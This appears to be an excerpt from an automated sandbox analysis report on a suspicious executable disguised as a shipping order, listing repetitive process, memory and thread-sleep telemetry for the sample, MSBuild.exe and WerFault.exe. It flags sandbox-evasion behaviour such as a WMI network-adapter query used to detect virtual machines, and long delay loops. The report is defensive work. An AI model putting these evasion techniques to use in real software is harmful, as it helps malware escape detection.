                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeMemory allocated: 2F10000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeMemory allocated: 1B000000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 10B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 10B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeWindow / User API: threadDelayed 1718Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeWindow / User API: threadDelayed 8115Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 964Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 8893Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -200000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6624Thread sleep count: 1718 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6624Thread sleep count: 8115 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -99890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -99781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -199344s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -199124s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -198906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -99344s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -99234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -99125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -99015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -98893s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -197562s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -197344s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -197124s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -98453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -196688s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -98234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -196250s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -98015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -97906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -97797s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -97687s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -97578s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -99219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -99109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -99000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -98890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -98016s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -97891s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -97766s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -97656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe TID: 6528Thread sleep time: -97547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep count: 35 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4588Thread sleep count: 964 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -99875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4588Thread sleep count: 8893 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -99765s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -99655s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -99546s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -99437s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -99328s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -99218s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -99109s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -98999s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -98890s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -98781s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -98669s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -98546s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -98437s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -98328s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -98218s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -98109s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -97999s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -97890s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -97781s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -97671s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -97562s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -97453s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -97343s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -97234s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -97125s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -97015s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -96906s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -96796s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -96687s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -96578s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -96468s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -96359s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -96250s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -96140s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -96031s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -95921s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -95812s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -95703s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -95593s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -95484s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -95375s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -95265s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -95156s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -95046s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -94937s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -94828s >= -30000sJump to behavior
